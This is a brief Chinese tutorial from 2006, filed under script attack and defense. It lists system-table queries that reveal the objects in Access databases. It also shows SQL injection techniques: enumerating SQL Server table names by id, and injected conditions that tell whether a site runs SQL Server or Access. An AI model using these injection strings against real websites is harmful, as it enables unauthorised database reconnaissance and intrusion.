獲取ACCESS數(shù)據(jù)庫(kù)中的表名/窗體/報(bào)表/模塊/查詢/宏

創(chuàng)建時(shí)間：2006-12-28
文章類別：腳本攻防
文章大?。?669 Bytes

使用直接的查詢語(yǔ)句獲取ACCESS數(shù)據(jù)庫(kù)中的表名/窗體/報(bào)表/模塊/查詢/宏---------------------------------------------------------------------------查詢:SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)=5 ORDER BY MSysObjects.Name;窗體:SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)=-32768 ORDER BY MSysObjects.Name;表:SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (Left$([Name],4) <> "Msys") AND (MSysObjects.Type)=1 ORDER BY MSysObjects.Name;報(bào)表:SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32764 ORDER BY MSysObjects.Name;模塊:SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32761 ORDER BY MSysObjects.Name;宏:SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32766 ORDER BY MSysObjects.Name;使用直接的查詢語(yǔ)句獲取SQL數(shù)據(jù)庫(kù)表名的方法-----------------------------------------------------------------------我們馬上就可以得到該數(shù)據(jù)庫(kù)下用戶表的第一個(gè)表名gallery的對(duì)象標(biāo)志2099048select top 1 name from sysobjects where xtype=u and id>2099048再得到第2個(gè)表名gb_data，這里用到的是id>2099048，因?yàn)閷?duì)象標(biāo)志id是根據(jù)由小到大排列的以此類推，我們可以得到所有的用戶表的名字了使用數(shù)據(jù)庫(kù)的系統(tǒng)表對(duì)象來(lái)判斷網(wǎng)站中使用的是何種數(shù)據(jù)庫(kù)格式(SQL/ACCESS)-----------------------------------------------------------------------我們可以在注入串中加上一個(gè)查詢語(yǔ)句:(select count(*) from sysobjects)>=0如果查詢結(jié)果成立,即是使用SQL數(shù)據(jù)庫(kù)的,反之否.加以下語(yǔ)句可判斷是否為ACCESS:(select count(*) from Msysaccessobjects)>=0如果查詢結(jié)果成立,即是ACCESS數(shù)據(jù)庫(kù),反之否.

本站僅提供存儲(chǔ)服務(wù)，所有內(nèi)容均由用戶發(fā)布，如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請(qǐng)點(diǎn)擊舉報(bào)。